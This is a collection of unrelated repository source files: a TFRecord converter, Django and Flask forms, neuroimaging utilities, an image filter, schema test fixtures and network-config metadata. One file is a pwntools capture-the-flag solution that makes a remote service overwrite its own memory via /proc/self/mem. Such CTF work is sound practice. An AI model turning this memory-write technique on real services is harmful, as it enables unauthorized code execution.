adf6d934419c355b36e68b81d02134ac7a49ae86 | 340f106a213c57d5621124187ca061690334364d | /ids_to_tfrecords.py | fa6365a73497f079182a9342bf5c1f1e3c84b5b3 | [] | no_license | sculd/financial-timeseries-prediction | c461bc7a7c8760ab090b8f53da50daa1f754da7f | c31784a63402580d0b04557e2ab29fc9a3126c9f | refs/heads/master | 2022-10-11T16:53:46.469168 | 2020-09-27T04:19:41 | 2020-09-27T04:19:41 | 209,095,902 | 0 | 0 | null | 2022-09-23T22:28:02 | 2019-09-17T15:52:12 | Python | UTF-8 | Python | false | false | 1,080 | py | import data.news.news_with_series_and_word_ids as news_with_ids
import sys
import tensorflow as tf
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _float_feature(value):
return tf.train.Feature(int64_list=tf.train.FloatList(value=[value]))
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def to_tfrecord(infile, outfile):
writer = tf.python_io.TFRecordWriter(outfile)
dy = news_with_ids.Daily(infile)
dit = news_with_ids.DailyIter(dy)
while dit.has_next():
day = dit.next()
feature = {'series': _float_feature(day.series),
'val/image': _bytes_feature(tf.compat.as_bytes(img.tostring()))}
example = tf.train.Example(features=tf.train.Features(feature=feature))
writer.write(example.SerializeToString())
writer.close()
sys.stdout.flush()
if __name__ == '__main__':
#to_tfrecord(news_with_ids.FILENAME_BLOOMBERG_PADDED)
#to_tfrecord(news_with_ids.FILENAME_REUTERS_PADDED)
pass
| [
"hjunlim@google.com"
] | hjunlim@google.com |
a26043b6ea7eb3b3799c888da1bdd4cb7d9183a7 | 9b018e9eac8d97fbcc1e76a69b95c994f79a6ea3 | /randomtest/migrations/0012_auto_20161022_0300.py | 48a3fcf8bd7d6e87f0cb8fb21a2ab32ff4a93869 | [] | no_license | hbgolze/contest-database | e39f269d7337652e7cdad03cc29827d4f729ec8f | 263385b438f7b7e1ab99062aad561ed0cec9c079 | refs/heads/master | 2023-06-26T21:30:08.246647 | 2023-06-11T02:34:41 | 2023-06-11T02:34:41 | 71,851,839 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-22 08:00
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('randomtest', '0011_auto_20161018_1942'),
]
operations = [
migrations.AlterField(
model_name='problem',
name='tags',
field=models.ManyToManyField(related_name='problems', to='randomtest.Tag'),
),
]
| [
"hbgolze@gmail.com"
] | hbgolze@gmail.com |
cde73725aceafd00af8f2c1e6b8249f1fc874a29 | e0529f219e47a25d55bc2885d295a2567b2dad9e | /lyman/utils.py | 1796927c09136a85b94520a806b4ae6ebc3a152d | [
"BSD-3-Clause"
] | permissive | kastman/lyman | 062541e1e9b1fbe0434818d0b1f28fce0b1bb8d8 | 109ad309960637fcf10686809f61aa19fe77eb08 | refs/heads/master | 2021-01-12T22:37:57.917174 | 2017-09-11T18:58:07 | 2017-09-11T18:58:07 | 34,122,592 | 1 | 0 | null | 2015-04-17T14:55:42 | 2015-04-17T14:55:42 | null | UTF-8 | Python | false | false | 5,785 | py | import os.path as op
import subprocess as sp
import numpy as np
import nibabel as nib
from nipype.interfaces.base import BaseInterface
class LymanInterface(BaseInterface):
"""Enhanced Interface object that custom interface should inherit from."""
def __init__(self, **inputs):
super(LymanInterface, self).__init__(**inputs)
self._results = {}
def _list_outputs(self):
"""Override BaseInterface._list_outputs using out _results dict."""
return self._results
def define_output(self, field, fname):
"""Set an interface output field using an absolute path to `fname`."""
fname = op.abspath(fname)
self._results[field] = fname
return fname
def write_image(self, field, fname, data, affine=None, header=None):
"""Write a nibabel image to disk and assign path to output field."""
fname = self.define_output(field, fname)
if isinstance(data, nib.Nifti1Image):
img = data
else:
img = nib.Nifti1Image(data, affine, header)
img.to_filename(fname)
return img
def write_visualization(self, field, fname, viz):
"""Write a visualization to disk and assign path to output field."""
fname = self.define_output(field, fname)
viz.savefig(fname, close=True)
def submit_cmdline(self, runtime, cmdline):
"""Submit a command-line job and capture the output."""
for attr in ["stdout", "stderr", "cmdline"]:
if not hasattr(runtime, attr):
setattr(runtime, attr, "")
if runtime.get("returncode", None) is None:
runtime.returncode = 0
if isinstance(cmdline, list):
cmdline = " ".join(cmdline)
proc = sp.Popen(cmdline,
stdout=sp.PIPE,
stderr=sp.PIPE,
shell=True,
cwd=runtime.cwd,
env=runtime.environ,
universal_newlines=True)
stdout, stderr = proc.communicate()
runtime.stdout += "\n" + stdout + "\n"
runtime.stderr += "\n" + stderr + "\n"
runtime.cmdline += "\n" + cmdline + "\n"
runtime.returncode += proc.returncode
if proc.returncode is None or proc.returncode != 0:
message = "\n\nCommand:\n" + runtime.cmdline + "\n"
message += "Standard output:\n" + runtime.stdout + "\n"
message += "Standard error:\n" + runtime.stderr + "\n"
message += "Return code: " + str(runtime.returncode)
raise RuntimeError(message)
return runtime
def image_to_matrix(img, mask_img):
"""Extract image data from voxels where mask is nonzero.
Parameters
----------
data : n_vox or n_tp, n_vox numpy array
Data matrix; if a time series, time should be on the first axis.
mask_img : 3D nifti image
Image defining the voxels where data will be extracted. All nonzero
voxels will be used; the mask does not have to be binary. Must be 3D.
Returns
-------
data : n_vox or n_tp, n_vox numpy array
Array with voxel data from ``img`` where the mask is nonzero. Note that
when the input image is a time series, the time dimension is the first
axis of the matrix (corresponding to the structure of a GLM).
"""
vol_data = img.get_data()
mask = mask_img.get_data() > 0
check_mask(mask, vol_data)
data = vol_data[mask].T
return data
def matrix_to_image(data, mask_img, template_img=None):
"""Convert a vector or matrix of data into a nibabel image.
Parameters
----------
data : n_vox or n_tp, n_vox numpy array
Data matrix; if a time series, time should be on the first axis.
mask_img : 3D nifti image
Image defining which voxels in the output should be filled with
``data``. All nonzero voxels will be used; the mask does not have to be
binary. Must be 3D.
template_img : nifti image
If present, the affine matrix and Nifti header will be assigned to the
output image; otherwise, these are taken from ``mask_img`.
Returns
-------
img : nifti image
Image with voxel data from ``data`` where the mask is nonzero, with
affine and header data from either the ``mask_img`` or, if present, the
``template_img``.
"""
# Determine the volumetric image shape
n_x, n_y, n_z = mask_img.shape
try:
n_tp, n_vox = data.shape
vol_shape = n_x, n_y, n_z, n_tp
except ValueError:
n_vox, = data.shape
vol_shape = n_x, n_y, n_z
# Determine the basis for the output affine/header
if template_img is None:
template_img = mask_img
# Put the data matrix into the volume where the mask is nonzero
mask = mask_img.get_data() > 0
vol_data = np.zeros(vol_shape, data.dtype)
vol_data[mask] = data.T
img = nib.Nifti1Image(vol_data, template_img.affine, template_img.header)
return img
def check_mask(mask, data):
"""Check the dtype and shape of a mask array.
This will raise a TypeError if ``mask`` is not boolean or a ValueError if
the shape of the mask does not match the first (n - 1) dimensions of the
data.
Parameters
----------
mask : boolean numpy array
Mask array to validate.
data : numpy array
Data that the mask will index into.
"""
if mask.dtype != np.bool:
raise TypeError("mask must have boolean datatype")
if (mask.shape != data.shape) and (mask.shape != data.shape[:-1]):
msg = ("mask shape {} is not aligned with data shape {}"
.format(mask.shape, data.shape))
raise ValueError(msg)
| [
"mwaskom@nyu.edu"
] | mwaskom@nyu.edu |
c8d40a97213711cc3933bc99f1589900311a3de2 | ab6996c3a3117cb64ba2805b1fd9cb0756f8ecbd | /Python/图像界面/a.py | 591f092d836dc2c9ec46d802223d31b6658f7dc3 | [] | no_license | LingFangYuan/Learning | ea8742e8f340ea337185d4b8c07bfe3b73fcfde8 | e71a3b38dca36de5427869b11341302deb6c55dd | refs/heads/master | 2021-06-30T16:46:22.424896 | 2020-10-19T01:13:40 | 2020-10-19T01:13:40 | 183,213,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | py | '''
1. 导入Tkinter包的所有内容
2. 从Frame派生一个Application类,这是所有Widget的父容器
3. 实例化Application,并启动消息循环
'''
from tkinter import *
class Application(Frame):
'''
pack()方法把Widget加入到父容器中,并实现布局。pack()是最简单的布局,grid()可以实现更复杂的布局。
在createWidgets()方法中,我们创建一个Label和一个Button,当Button被点击时,触发self.quit()使程序退出。
'''
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack()
self.createWidgets()
def createWidgets(self):
self.helloLabel = Label(self, text='Hello, world!')
self.helloLabel.pack()
self.quitButton = Button(self, text='Quit', command=self.quit)
self.quitButton.pack()
app = Application()
app.master.title('Hello World') # 设置窗口标题
app.mainloop() # 主消息循环 | [
"786173189@qq.com"
] | 786173189@qq.com |
8c7e2adbc22996b3fd30a7b6dc04ab0e1152afaa | 581489b1f77fcfb44aa5d21a3d9a85eec131a992 | /Q3/adaptivemedian.py | f082e040f017d163bfab5db18d9f91f9caa204b3 | [] | no_license | mohit1997/DIP_Assignment3 | 070ba27c5de2ac3daf97cc999356a6dff7b1e690 | 412bcc4df41e2ab821e9b4ea1368db7afa84f7d1 | refs/heads/master | 2020-04-22T01:13:07.169836 | 2019-02-10T17:54:37 | 2019-02-10T17:54:37 | 170,007,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,741 | py | import cv2
import numpy as np
import matplotlib.pyplot as plt
# from numpy import *
def addsnp(img, prob):
temp = img.copy()
matsnp = np.random.rand(temp.shape[0], temp.shape[1])
temp[matsnp < prob] = 0
temp[matsnp > 1-prob] = 255
return temp
def demo(target_array):
return int(np.median(target_array)), int(np.max(target_array)), int(np.min(target_array))
def adaptivemedian(image, window=3):
## set filter window and image dimensions
W = 2*window + 1
xlength, ylength = img.shape
vlength = W*W
## create 2-D image array and initialize window
paddedimage = np.pad(image.copy(), window, 'constant', constant_values=255)
print(np.max(image))
image_array = np.array(paddedimage, dtype=np.uint8)
filter_window = np.array(np.zeros((W,W)))
target_vector = np.array(np.zeros(vlength))
changed = 0
try:
for y in range(window, ylength+window):
for x in range(window, xlength+window):
for w in range(1, window):
filter_window = image_array[x-w:x+w+1, y-w:y+w+1]
# print(filter_window)
# target_vector = np.reshape(filter_window, ((vlength),))
median, max_pixel, min_pixel = demo(filter_window)
if median < max_pixel and median > min_pixel:
if paddedimage[x, y] == min_pixel or paddedimage[x, y] == max_pixel:
image_array[x, y] = median
changed += 1
break
except TypeError:
print "Error in processing function:", err
sys.exit(2)
print changed, "pixel(s) filtered out of", xlength*ylength
## return only central array
return image_array[window:-window, window:-window]
img = cv2.imread('sudoku.jpeg',0)
print(img.shape)
noise_img = addsnp(img, prob=0.1)
output = adaptivemedian(noise_img)
print(output.shape)
plt.imshow(output, cmap='gray')
plt.show() | [
"goyal.mohit999@gmail.com"
] | goyal.mohit999@gmail.com |
4edbc6f0e883443c9ada413f038f5dcd236353ab | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/unsignedShort/Schema+Instance/NISTXML-SV-IV-list-unsignedShort-length-3-5.py | e801ec78b6058e3ed692bed75dc6f63281b3cde9 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 384 | py | from output.models.nist_data.list_pkg.unsigned_short.schema_instance.nistschema_sv_iv_list_unsigned_short_length_3_xsd.nistschema_sv_iv_list_unsigned_short_length_3 import NistschemaSvIvListUnsignedShortLength3
obj = NistschemaSvIvListUnsignedShortLength3(
value=[
63121,
62313,
61422,
64312,
61223,
63123,
62213,
]
)
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
efa0fb0b08d91fe3a42a3457bb078348a8855c06 | c57439f0c98af370ace65f9d55ef5a457bedc531 | /ydk/models/ethernet/_meta/_Cisco_IOS_XR_ethernet_link_oam_cfg.py | 74282235af8ec7a26796e056d9e2d8daca2e4608 | [
"Apache-2.0"
] | permissive | myahmao/ydk-py | c932fbd8245e554227cce0fd723d9a22887b0c40 | 2f367d93f2088d4abdc2f2bb10ca4864952b458a | refs/heads/master | 2021-01-14T11:32:29.064494 | 2016-03-15T22:44:05 | 2016-03-15T22:44:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,396 | py |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum, _dm_validate_value
from ydk.types import Empty, YList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYDataValidationError
from ydk.models import _yang_ns
_meta_table = {
'EtherLinkOamInterfaceModeEnum_Enum' : _MetaInfoEnum('EtherLinkOamInterfaceModeEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'passive':'PASSIVE',
'active':'ACTIVE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamProfileHelloIntervalEnum_Enum' : _MetaInfoEnum('EtherLinkOamProfileHelloIntervalEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'100ms':'Y_100MS',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'error-disable':'ERROR_DISABLE',
'log':'LOG',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionPrimEnum_Enum' : _MetaInfoEnum('EtherLinkOamEventActionPrimEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'log':'LOG',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamProfileRequireModeEnum_Enum' : _MetaInfoEnum('EtherLinkOamProfileRequireModeEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'passive':'PASSIVE',
'active':'ACTIVE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamInterfaceRequireModeEnum_Enum' : _MetaInfoEnum('EtherLinkOamInterfaceRequireModeEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'passive':'PASSIVE',
'active':'ACTIVE',
'dont-care':'DONT_CARE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum2_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum2_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'error-disable':'ERROR_DISABLE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum5_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum5_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'error-disable':'ERROR_DISABLE',
'efd':'EFD',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum4_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum4_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamProfileModeEnum_Enum' : _MetaInfoEnum('EtherLinkOamProfileModeEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'passive':'PASSIVE',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum6_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum6_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'log':'LOG',
'efd':'EFD',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnumEfd_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnumEfd_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'disable':'DISABLE',
'error-disable':'ERROR_DISABLE',
'log':'LOG',
'efd':'EFD',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamEventActionEnum1_Enum' : _MetaInfoEnum('EtherLinkOamEventActionEnum1_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'error-disable':'ERROR_DISABLE',
'log':'LOG',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
'EtherLinkOamInterfaceHelloIntervalEnum_Enum' : _MetaInfoEnum('EtherLinkOamInterfaceHelloIntervalEnum_Enum', 'ydk.models.ethernet.Cisco_IOS_XR_ethernet_link_oam_cfg',
{
'1s':'Y_1S',
'100ms':'Y_100MS',
}, 'Cisco-IOS-XR-ethernet-link-oam-cfg', _yang_ns._namespaces['Cisco-IOS-XR-ethernet-link-oam-cfg']),
}
| [
"manradha@cisco.com"
] | manradha@cisco.com |
dd043fb3cbfb66d0d34258a4450127a65ceb0a86 | 1031b8594d4aa515efef1b09fec7ab0574a9c9ee | /ctf4b/misc/writeme/for_root/solve.py | 64bb1141e876426174d23ad85d2113fbff8fc999 | [] | no_license | kam1tsur3/2021_CTF | 0e322809dc95adab99e19f13dffbf209c5a923a1 | ee12843cd7901488730c41c8b313fc912cff9e46 | refs/heads/master | 2023-08-29T21:06:53.101057 | 2021-10-26T13:56:49 | 2021-10-26T13:56:49 | 328,184,763 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 932 | py | #!/usr/bin/python3
from pwn import *
import sys
#import kmpwn
sys.path.append('/home/vagrant/kmpwn')
from kmpwn import *
# fsb(width, offset, data, padding, roop)
# sop()
# fake_file()
#config
context(os='linux', arch='i386')
context.log_level = 'debug'
#FILE_NAME = ""
HOST = "writeme.quals.beginners.seccon.jp"
PORT = 27182
if len(sys.argv) > 1 and sys.argv[1] == 'r':
conn = remote(HOST, PORT)
else:
conn = process(FILE_NAME)
#elf = ELF(FILE_NAME)
#addr_main = elf.symbols["main"]
#addr_bss = elf.bss()
#addr_dynsym = elf.get_section_by_name('.dynsym').header['sh_addr']
#
#libc = ELF('./')
#off_binsh = next(libc.search(b"/bin/sh"))
def exploit():
conn.sendlineafter("Chance: ", "id(1)")
id1 = int(conn.recvline())
id42 = id1+0x20*(42-1)
id99 = id1+0x20*(99-1)
conn.sendlineafter("File: ", "/proc/self/mem")
conn.sendlineafter("Seek: ", str(id42+0x18))
conn.interactive()
if __name__ == "__main__":
exploit()
| [
"kam1tsur3@gmail.com"
] | kam1tsur3@gmail.com |
8cd63af1169d1fcf9e6125f76cc58d8141c7871d | bc441bb06b8948288f110af63feda4e798f30225 | /pipeline_sdk/api/provider/create_pb2.pyi | 8002306b0b0a1751fea438b6d5e9ee7a1d2bde36 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,201 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from pipeline_sdk.model.pipeline.provider_pb2 import (
Provider as pipeline_sdk___model___pipeline___provider_pb2___Provider,
)
from typing import (
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class CreateResponseWrapper(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
code = ... # type: builtin___int
codeExplain = ... # type: typing___Text
error = ... # type: typing___Text
@property
def data(self) -> pipeline_sdk___model___pipeline___provider_pb2___Provider: ...
def __init__(self,
*,
code : typing___Optional[builtin___int] = None,
codeExplain : typing___Optional[typing___Text] = None,
error : typing___Optional[typing___Text] = None,
data : typing___Optional[pipeline_sdk___model___pipeline___provider_pb2___Provider] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> CreateResponseWrapper: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> CreateResponseWrapper: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"data",b"data"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"code",b"code",u"codeExplain",b"codeExplain",u"data",b"data",u"error",b"error"]) -> None: ...
| [
"service@easyops.cn"
] | service@easyops.cn |
470106cd4abe3353497fb7c902be5c4d70ba8175 | 660e5b74a1cf44adce42c142e8ea92dc72077f86 | /app/main/forms.py | ea8c26e74f1bf3267439e012f48481f20b5f62c8 | [
"MIT"
] | permissive | vincentouma/pitch-hub | d48640572a9ee99d1aaf870663c9be879b0227fc | e6549d5607656be053928c8f04257be3fc1c8cfa | refs/heads/master | 2022-09-30T04:34:09.102432 | 2019-08-07T06:12:24 | 2019-08-07T06:12:24 | 200,806,879 | 0 | 0 | null | 2022-09-16T18:07:18 | 2019-08-06T08:12:39 | Python | UTF-8 | Python | false | false | 854 | py |
from flask_wtf import FlaskForm
from wtforms import SubmitField,TextAreaField, RadioField
from wtforms.validators import Required
from wtforms import ValidationError
class PitchForm(FlaskForm):
content = TextAreaField("Your Pitch ?",validators=[Required()])
category = RadioField('PitchListing', choices = [('Business', 'Business'), ('comedy', 'comedy'), ('Entertainment', 'Entertainment'),('Politics', 'Politics')])
submit = SubmitField('Submit')
class CommentForm(FlaskForm):
description = TextAreaField('Add comment',validators=[Required()])
submit = SubmitField()
class UpdateProfile(FlaskForm):
bio = TextAreaField('About You.',validators = [Required()])
submit = SubmitField('Submit')
class ListingForm(FlaskForm):
add = TextAreaField('Add Listing.',validators= [Required()])
submit = SubmitField('Submit') | [
"vinceoumah@gmail.com"
] | vinceoumah@gmail.com |
400c494c3e5867d7b3257265ba44a3ceebe744a6 | 61f8d25a8ee2afbd3e9d8e79621ff5a2ef0c570c | /amy/workshops/fields.py | 6825e2c715561ed4bd648c3b495b2d8e744c990b | [
"MIT"
] | permissive | annajiat/amy | 40380c5726255fc4cc6ad60c20c9946a38b8bf38 | 13e422ba743a9b5a2d437b4da19625f03e8aeec5 | refs/heads/develop | 2022-05-21T17:03:32.094791 | 2019-12-13T11:22:25 | 2019-12-13T11:22:25 | 227,821,578 | 0 | 0 | MIT | 2019-12-13T11:22:27 | 2019-12-13T11:09:14 | null | UTF-8 | Python | false | false | 6,143 | py | from django_select2.forms import (
Select2Widget as DS2_Select2Widget,
Select2MultipleWidget as DS2_Select2MultipleWidget,
ModelSelect2Widget as DS2_ModelSelect2Widget,
ModelSelect2MultipleWidget as DS2_ModelSelect2MultipleWidget,
Select2TagWidget as DS2_Select2TagWidget,
)
from django.core.validators import RegexValidator, MaxLengthValidator
from django.db import models
from django import forms
from django.utils.safestring import mark_safe
GHUSERNAME_MAX_LENGTH_VALIDATOR = MaxLengthValidator(39,
message='Maximum allowed username length is 39 characters.',
)
# according to https://stackoverflow.com/q/30281026,
# GH username can only contain alphanumeric characters and
# hyphens (but not consecutive), cannot start or end with
# a hyphen, and can't be longer than 39 characters
GHUSERNAME_REGEX_VALIDATOR = RegexValidator(
# regex inspired by above StackOverflow thread
regex=r'^([a-zA-Z\d](?:-?[a-zA-Z\d])*)$',
message='This is not a valid GitHub username.',
)
class NullableGithubUsernameField(models.CharField):
def __init__(self, **kwargs):
kwargs.setdefault('null', True)
kwargs.setdefault('blank', True)
kwargs.setdefault('default', '')
# max length of the GH username is 39 characters
kwargs.setdefault('max_length', 39)
super().__init__(**kwargs)
default_validators = [
GHUSERNAME_MAX_LENGTH_VALIDATOR,
GHUSERNAME_REGEX_VALIDATOR,
]
#------------------------------------------------------------
class FakeRequiredMixin:
def __init__(self, *args, **kwargs):
# Intercept "fake_required" attribute that's used for marking field
# with "*" (asterisk) even though it's not required.
# Additionally `fake_required` doesn't trigger any validation.
self.fake_required = kwargs.pop('fake_required', False)
super().__init__(*args, **kwargs)
class RadioSelectWithOther(FakeRequiredMixin, forms.RadioSelect):
"""A RadioSelect widget that should render additional field ('Other').
We have a number of occurences of two model fields bound together: one
containing predefined set of choices, the other being a text input for
other input user wants to choose instead of one of our predefined options.
This widget should help with rendering two widgets in one table row."""
other_field = None # to be bound later
def __init__(self, other_field_name, *args, **kwargs):
super().__init__(*args, **kwargs)
self.other_field_name = other_field_name
class CheckboxSelectMultipleWithOthers(FakeRequiredMixin, forms.CheckboxSelectMultiple):
"""A multiple choice widget that should render additional field ('Other').
We have a number of occurences of two model fields bound together: one
containing predefined set of choices, the other being a text input for
other input user wants to choose instead of one of our predefined options.
This widget should help with rendering two widgets in one table row."""
other_field = None # to be bound later
def __init__(self, other_field_name, *args, **kwargs):
super().__init__(*args, **kwargs)
self.other_field_name = other_field_name
class RadioSelectFakeMultiple(FakeRequiredMixin, forms.RadioSelect):
"""Pretend to be a radio-select with multiple selection possible. This
is intended to 'fool' Django into thinking that user selected 1 item on
a multi-select item list."""
allow_multiple_selected = True
class SafeLabelFromInstanceMixin:
def label_from_instance(self, obj):
return mark_safe(obj)
class SafeModelChoiceField(SafeLabelFromInstanceMixin, forms.ModelChoiceField):
pass
class SafeModelMultipleChoiceField(SafeLabelFromInstanceMixin,
forms.ModelMultipleChoiceField):
pass
class CurriculumModelMultipleChoiceField(SafeModelMultipleChoiceField):
def label_from_instance(self, obj):
# Display in tooltip (it's a little better than popover, because it
# auto-hides and doesn't require clicking on the element, whereas
# popover by clicking will automatically select the clicked item)
data = (
'<a tabindex="0" role="button" data-toggle="tooltip" '
'data-placement="top" title="{description}">{obj}</a>'
.format(obj=obj, description=obj.description)
)
return super().label_from_instance(data)
#------------------------------------------------------------
class Select2BootstrapMixin:
def build_attrs(self, *args, **kwargs):
attrs = super().build_attrs(*args, **kwargs)
attrs.setdefault('data-theme', 'bootstrap4')
return attrs
class Select2NoMinimumInputLength:
def build_attrs(self, *args, **kwargs):
# Let's set up the minimum input length first!
# It will overwrite `setdefault('data-minimum-input-length')` from
# other mixins.
self.attrs.setdefault('data-minimum-input-length', 0)
attrs = super().build_attrs(*args, **kwargs)
return attrs
class Select2Widget(FakeRequiredMixin, Select2BootstrapMixin,
DS2_Select2Widget):
pass
class Select2MultipleWidget(Select2BootstrapMixin, DS2_Select2MultipleWidget):
pass
class ModelSelect2Widget(Select2BootstrapMixin, Select2NoMinimumInputLength,
DS2_ModelSelect2Widget):
pass
class ModelSelect2MultipleWidget(Select2BootstrapMixin,
Select2NoMinimumInputLength,
DS2_ModelSelect2MultipleWidget):
pass
class Select2TagWidget(Select2BootstrapMixin, DS2_Select2TagWidget):
def value_from_datadict(self, data, files, name):
# sometimes data is held as an immutable QueryDict
# in those cases, we need to make a copy of it to "disable"
# the mutability
try:
data_mutable = data.copy()
except AttributeError:
data_mutable = data
data_mutable.setdefault(name, '')
return super().value_from_datadict(data_mutable, files, name)
| [
"piotr@banaszkiewicz.org"
] | piotr@banaszkiewicz.org |
8cdaf71a142ccfe0cfd57bc1020bbaf7ad2bbd60 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/cs61a/untarred backup/182.py | 3b31cc2ab912f0523f7fde4cccbd92a78b7f0dc9 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 969 | py | def num_common_letters(goal_word, guess):
"""Returns the number of letters in goal_word that are also in guess.
As per the rules of the game, goal_word cannot have any repeated
letters, but guess is allowed to have repeated letters.
